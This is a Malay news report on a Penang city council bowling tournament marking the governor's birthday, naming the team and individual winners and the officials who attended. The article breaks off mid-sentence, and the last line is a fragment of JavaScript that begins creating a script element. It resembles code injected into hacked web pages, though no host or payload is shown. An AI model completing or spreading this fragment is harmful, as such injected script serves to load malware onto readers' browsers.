Ahli Majlis juara Kategori Individu Kejohanan Boling TYT

GEORGE TOWN – Pasukan boling, USM Eagles dari Universiti Sains Malaysia (USM) diumumkan juara pada Kejohanan Boling Sempena Hari Jadi Tuan Yang Terutama Negeri (TYT) Ke-77 anjuran Majlis Bandaraya Pulau Pinang (MBPP) di sini baru-baru ini.

Menurut Datuk Bandar MBPP, Dato’ Patahiyah Ismail, kejayaan USM Eagles menewaskan 17 pasukan lain membolehkan mereka membawa pulang hadiah wang tunai berjumlah RM1,500 berserta pingat.

“Mereka berjaya mengalahkan pasukan tempat kedua, MBPP ‘A’ dengan kelebihan sebanyak 159 jatuhan pin iaitu 2,135 jatuhan pin berbanding 1,976 jatuhan pin pada tiga perlawanan,” katanya ketika ditemui di sini.

Memeriahkan majlis adalah kehadiran TYT, Tun Dr. Abdul Rahman Abbas bersamasama isteri, Toh Puan Dato’ Majimor Shariff. Turut hadir, Setiausaha Kerajaan Negeri, Dato’ Seri Farizan Darus dan Setiausaha Bandaraya MBPP, Ir. Ang Aing Thye.

Tambah Patahiyah, kejohanan tersebut merupakan acara julung kali diadakan setelah MBPP menerima status sebagai sebuah bandaraya.

“Kita (MBPP) sentiasa komited dengan penganjuran sukan di peringkat kebangsaan mahupun antarabangsa.

“Buktinya, kita (MBPP) telah berjaya memperoleh kejayaan dalam sukan perahu naga dan paintball di peringkat antarabangsa,” ujar beliau.

Kejohanan berkaitan memperlihatkan sejumlah 36 penyertaan bagi Kategori Pihak Berkuasa Tempatan dan Kategori Agensi Kerajaan Negeri (18).

Dalam pada itu, Ahli Majlis MBPP, Ong Ah Teong munjul juara bagi Kategori Individu apabila berjaya meraih 300 jatuhan pin dalam tiga perlawanan yang diadakan

var d=document;var s=d.createElement(‘script’);